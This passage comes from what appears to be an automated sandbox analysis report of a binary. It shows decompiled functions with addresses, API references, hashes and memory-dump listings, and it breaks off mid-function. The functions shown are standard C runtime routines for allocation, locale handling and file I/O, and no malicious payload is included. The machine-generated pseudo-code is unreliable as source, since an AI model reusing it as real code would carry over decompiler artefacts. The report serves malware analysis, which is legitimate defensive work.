Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA58, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FA58() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x425080;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x425080 = _t5;
				}
				_t6 = E00411CBA(_t5, 4);
				 *0x424060 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x422450;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4226d0) {
							break;
						}
						_t6 =  *0x424060;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x422460;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4224c0);
					return 0;
				} else {
					 *0x425080 = _t26;
					_t6 = E00411CBA(_t26, 4);
					 *0x424060 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x0040fa58
0x0040fa60
0x0040fa63
0x0040fa6e
0x0040fa70
0x00000000
0x0040fa70
0x0040fa65
0x0040fa65
0x0040fa72
0x0040fa72
0x0040fa72
0x0040fa7a
0x0040fa81
0x0040fa88
0x0040faa8
0x0040faa8
0x0040faaa
0x0040fab6
0x0040fab6
0x0040fab9
0x0040fabc
0x0040fac5
0x00000000
0x00000000
0x0040fab1
0x0040fab1
0x0040fac9
0x0040faca
0x0040facc
0x0040fad2
0x0040fae6
0x0040faec
0x0040faf6
0x0040faf6
0x0040faf8
0x0040fafb
0x0040fafc
0x0040fb08
0x0040fa8a
0x0040fa8d
0x0040fa93
0x0040fa9a
0x0040faa1
0x00000000
0x0040faa3
0x0040faa5
0x0040faa7
0x0040faa7
0x0040faa1

APIs

__calloc_crt.LIBCMT ref: 0040FA7A
__calloc_crt.LIBCMT ref: 0040FA93

Strings

P$B, xrefs: 0040FAAA
`$B, xrefs: 0040FACC

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: e56331e4616de171219dccd971e0455493e892fc76003f67a58995f67ba85e27
Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
Opcode Fuzzy Hash: e56331e4616de171219dccd971e0455493e892fc76003f67a58995f67ba85e27
Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00413610, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 004146FA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004146FA(intOrPtr* __eax, intOrPtr __edi) {
				intOrPtr _t10;
				intOrPtr* _t12;

				_t10 = __edi;
				if(__edi == 0 || __eax == 0) {
					return 0;
				} else {
					_t12 =  *__eax;
					if(_t12 != __edi) {
						 *__eax = __edi;
						E004145D2(__edi);
						if(_t12 != 0) {
							E00414661(_t12);
							if( *_t12 == 0 && _t12 != 0x422e40) {
								E00414489(_t12);
							}
						}
					}
					return _t10;
				}
			}

0x004146fa
0x004146fc
0x00414737
0x00414702
0x00414703
0x00414707
0x0041470a
0x0041470c
0x00414714
0x00414717
0x00414720
0x0041472b
0x00414730
0x00414720
0x00414714
0x00414734
0x00414734

APIs

___addlocaleref.LIBCMT ref: 0041470C

Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A

___removelocaleref.LIBCMT ref: 00414717

Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1

___freetlocinfo.LIBCMT ref: 0041472B

Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575

Strings

@.B, xrefs: 00414722

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: @.B
API String ID: 467427115-470711618
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748, Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
